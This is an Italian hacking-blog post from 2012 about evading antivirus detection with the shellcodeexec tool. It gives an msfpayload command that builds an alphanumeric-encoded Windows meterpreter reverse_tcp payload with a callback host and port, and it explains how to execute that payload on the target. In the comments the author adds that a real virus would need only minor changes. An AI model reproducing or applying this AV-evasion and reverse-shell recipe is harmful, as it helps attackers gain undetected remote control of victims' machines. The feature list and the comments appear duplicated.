ClsHack:Computer Security Blog    

Metasploit && shellcodeexec bypassing any AntiVirus

Posted on: 22 January 2012

Bernardo Damel sul blog ha trovato un nuovo modo per bypassare qualsiasi antivirus.
shellcodeexec è un script disponibile con sorgente per windows e linux.

Le caratteristiche di shellcodeexec sono le seguenti:

  • Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
  • Can be compiled and works on 32-bit and 64-bit architectures.
  • As far as I know, no AV detect it as malicious.

  • Works in DEP/NX-enabled environments: it allocates the memory page where it stores the shellcode as +rwx – Readable Writable and eXecutable.
  • It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit’s msfpayload) to Metasploit’s msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode.
  • Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours.
    It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit’s msfpayload) to Metasploit’s msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode.

 

    Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours.

Vediamo come provarlo su backbox.
Installiamo git:
sudo apt-get install git
Scarichiamo il sorgente:
git clone https://github.com/inquisb/shellcodeexec.git
Adesso:
cd shellcodeexec
Adesso per un tutorial:
cat README | more

Per provarlo useremo msfpayload:
sudo -s
msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.1.100 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

E dopo su windows:
shellcodeexec [msfencode's alphanumeric-encoded payload]

La stessa cosa vale anche per linux, prima si genera il payload e dopo lo si esegue con shellcodeexec.

Buon divertimento :D

Related posts:

  1. [Metasploit] Bypass Antivirus with msfencode
  2. [PDF]Download Metasploit Unleashed
  3. GUIDA a METASPLOIT IN PDF [65 pagine :) ]
  4. [PDF] Download Meterpreter && Metasploit Cheat Sheet
  5. Metasploit 3.4 and Metasploitable

This entry was posted on Sunday, January 22nd, 2012 at 4:16 pm and is filed under GNU/Linux, Hacking, Software. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Tagged with:
  • http://twitter.com/PROPPETTO domenico michienzi

    scusa l’ignoranza, ma in che senso “dopo su windows”

    • ClsHackBlog

      Su windows eseguirai il programma shellcodeexec [msfencode's alphanumeric-encoded payload] :)

  • http://twitter.com/PROPPETTO domenico michienzi

    scusa l’ignoranza, ma in che senso “dopo su windows”

    • ClsHackBlog

      Su windows eseguirai il programma shellcodeexec [msfencode's alphanumeric-encoded payload] :)

  • http://twitter.com/PROPPETTO domenico michienzi

    da terminale??

    • ClsHackBlog

      si ;) naturalmente questa è la procedura per testare la cosa dentro un eventuale virus devi cambiare un po’ le cose ;) 

  • http://twitter.com/PROPPETTO domenico michienzi

    da terminale??

    • ClsHackBlog

      si ;) naturalmente questa è la procedura per testare la cosa dentro un eventuale virus devi cambiare un po’ le cose ;)